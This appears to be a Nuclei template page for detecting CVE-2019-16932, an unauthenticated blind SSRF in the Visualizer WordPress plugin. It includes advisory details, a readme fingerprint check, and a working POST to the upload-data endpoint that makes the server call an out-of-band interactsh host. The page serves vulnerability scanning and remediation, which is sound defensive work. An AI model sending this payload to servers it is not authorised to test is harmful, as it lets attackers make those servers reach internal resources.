Visualizer <3.3.1 - Blind Server-Side Request Forgery
ID: CVE-2019-16932
Severity: critical
Author: akincibor
Tags: cve,cve2019,wp-plugin,ssrf,wordpress,oast,unauth,wpscan,intrusive,themeisle,xss
Description
Section titled “Description”Visualizer prior to 3.3.1 suffers from a blind server-side request forgery vulnerability via the /wp-json/visualizer/v1/upload-data endpoint.
YAML Source
Section titled “YAML Source”id: CVE-2019-16932
info: name: Visualizer <3.3.1 - Blind Server-Side Request Forgery author: akincibor severity: critical description: | Visualizer prior to 3.3.1 suffers from a blind server-side request forgery vulnerability via the /wp-json/visualizer/v1/upload-data endpoint. impact: | An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access or data leakage. remediation: | Update Visualizer plugin to version 3.3.1 or later to fix the SSRF vulnerability. reference: - https://wpscan.com/vulnerability/9892 - https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf - https://nvd.nist.gov/vuln/detail/CVE-2019-16932 - https://wordpress.org/plugins/visualizer/#developers - https://wpvulndb.com/vulnerabilities/9892 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N cvss-score: 10 cve-id: CVE-2019-16932 cwe-id: CWE-918 epss-score: 0.37504 epss-percentile: 0.97194 cpe: cpe:2.3:a:themeisle:visualizer:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: themeisle product: visualizer framework: wordpress tags: cve,cve2019,wp-plugin,ssrf,wordpress,oast,unauth,wpscan,intrusive,themeisle,xssflow: http(1) && http(2)
http: - raw: - | GET /wp-content/plugins/visualizer/readme.txt HTTP/1.1 Host: {{Hostname}}
matchers: - type: word internal: true words: - 'Visualizer' - 'Tested up to:' condition: and
- method: POST path: - "{{BaseURL}}/wp-json/visualizer/v1/upload-data"
body: '{\"url\":\"http://{{interactsh-url}}\"}'
headers: Content-Type: application/x-www-form-urlencoded
matchers-condition: and matchers: - type: word name: http part: interactsh_protocol words: - http
- type: word part: header words: - application/json
- type: status status: - 200# digest: 4b0a00483046022100bb5f8432923681dbbc3b2e067c31bcc317cb4a19b53b65921c538155633e8623022100e598792b3a61e8ec100defd841888f6f966f9313b85077dba150b912163e1269:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-16932.yaml"